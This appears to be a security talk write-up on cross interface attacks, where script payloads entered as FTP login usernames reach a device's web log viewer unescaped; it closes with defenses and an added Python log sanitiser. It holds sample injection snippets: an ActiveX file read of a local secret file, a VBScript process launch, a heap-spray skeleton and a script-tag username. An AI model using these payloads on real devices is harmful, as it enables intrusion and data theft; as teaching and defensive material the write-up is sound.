
Piyush Mittal Security Compass

Introduction
A cross interface attack (CIA) is when one interface is used to attack another interface of the same product.

Different from XSS

XSS - Entry point is from web to web
CIA - Entry point is from a backend login console (FTP/Telnet) to the web interface

CIA Characteristics

Exploits the default nature of the FTP/Telnet protocol
Admin interfaces: {Web, FTP, Telnet}
Logging module running as root
DOM and HTML rendered as dynamic content
Attacks are persistent in nature
Affected hardware: firewalls, disk stations, management systems etc.

Truth About FTP

The default design of FTP accepts both the username and the password before the authentication process and complete verification take place.
No check on the number of login attempts.
No check on the type of characters accepted.

Old Buffer Trick

root@redux$ ftp example.com
Connected to example.com.
220 Disk Station FTP server at DiskStation ready.
User (example.com:(none)): AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA
331 Password required for AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA.
Password:
530 Login incorrect.
Login failed.

Design of the Application

Flow shown in the slide diagram (built up step by step in the deck):

FTP LOGIN INTERFACE
  |  Inject Payload (arbitrary username accepted by the login console)
  v
FTP Authentication Module
  |
  v
FTP Logging Module (runs as root or administrator)
  |
  v
Web Interface (Unencoded/Unfiltered HTML rendering of the logs)

THREATS

Information Stealing (sample code shown on slide)
Cookie Stealing
Malware Infections - executing payloads to conduct drive-by download attacks (sample code shown on slide)
Drive-by Download Attack
CSRF - turning the network device into an attack pot (sample code shown on slide)

Advanced Code Injections

ActiveX code execution
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var XFile = fso.GetFile("c:/business/secret.txt");
    var stream = XFile.OpenAsTextStream(1, 0);
    var content = stream.ReadAll();

VBScript code execution
    <object classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8" id="target"></object>
    <script language="vbscript">
    arg1 = "c:/WINDOWS/system32/calc.exe"
    target.Exec arg1
    </script>

Heap Spray code execution
    var shellcode = unescape();
    var heap_block = unescape("%u0a0a%u0a0a");
    var nop_sled = unescape("%u09090%u09090%u09090");
    do {
        heap_block += heap_block;
    } while (heap_block.length < xxxx);
    var memory = new Array();
    for (ret = 0; ret < 100; ret++) {
        memory[ret] += heap_block + nop_sled + shellcode;
    }

AJAX code execution

DEFENSE

A whitelist approach should be followed at the protocol level to reduce the impact of exploitation.
The error reporting mechanism should be used in conjunction with the FTP authentication module to restrict the acceptance of malicious input through login consoles.
The logging process should not run as the administrator or root user.
The logs should be rendered in a customized format which does not allow DOM and HTML elements to be rendered as dynamic content.
The content should be inspected so that the Content-Type is defined appropriately and malicious input is not rendered.
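The whitelist and log-rendering defenses above, as an added example that is not from the talk: a small Python log viewer that parses a constructed sample of FTP daemon log lines (the line format and the username policy are assumptions), flags usernames the protocol-level whitelist would have rejected, and shows the unencoded rendering that makes the attack work beside the escaped one that defeats it.

```python
import html
import re

# Constructed sample log (assumed ftpd format); the last entry carries the
# kind of script payload a login console accepts and a naive web viewer renders.
SAMPLE_FTP_LOG = """\
Jan 05 10:12:01 diskstation ftpd[412]: FAILED LOGIN user=alice from 192.0.2.10
Jan 05 10:12:44 diskstation ftpd[412]: LOGIN user=bob from 192.0.2.11
Jan 05 10:13:02 diskstation ftpd[412]: FAILED LOGIN user=<script>alert(1)</script> from 192.0.2.12
"""

LOG_LINE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) ftpd\[(?P<pid>\d+)\]: "
    r"(?P<event>FAILED LOGIN|LOGIN) user=(?P<user>.*?) from (?P<ip>[\d.]+)$"
)

# Protocol-level whitelist (assumed policy): letters, digits, dot, underscore,
# hyphen, 1 to 32 characters. Anything else should be rejected before logging.
USERNAME_OK = re.compile(r"[A-Za-z0-9._-]{1,32}")

def username_allowed(user):
    return USERNAME_OK.fullmatch(user) is not None

def parse_log(text):
    """Split the log into field dictionaries; lines that do not match are dropped."""
    return [m.groupdict() for m in map(LOG_LINE.match, text.splitlines()) if m]

def render_table_unsafe(text):
    """The vulnerable pattern: log fields concatenated straight into HTML."""
    rows = "".join(
        "<tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>"
        % (e["ts"], e["event"], e["user"], e["ip"]) for e in parse_log(text))
    return "<table>" + rows + "</table>"

def render_table(text):
    """Hardened viewer: every field is HTML-escaped, and entries whose username
    fails the whitelist are marked so the viewer can highlight them."""
    rows = []
    for e in parse_log(text):
        cells = "".join("<td>%s</td>" % html.escape(e[k], quote=True)
                        for k in ("ts", "event", "user", "ip"))
        cls = "" if username_allowed(e["user"]) else ' class="rejected"'
        rows.append("<tr%s>%s</tr>" % (cls, cells))
    return "<table>" + "".join(rows) + "</table>"
```

Serve the table with an explicit `Content-Type: text/html; charset=utf-8` so the browser does not sniff the response; the escaping is what keeps the logged payload inert.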

???????

When in doubt, it's better to ask.

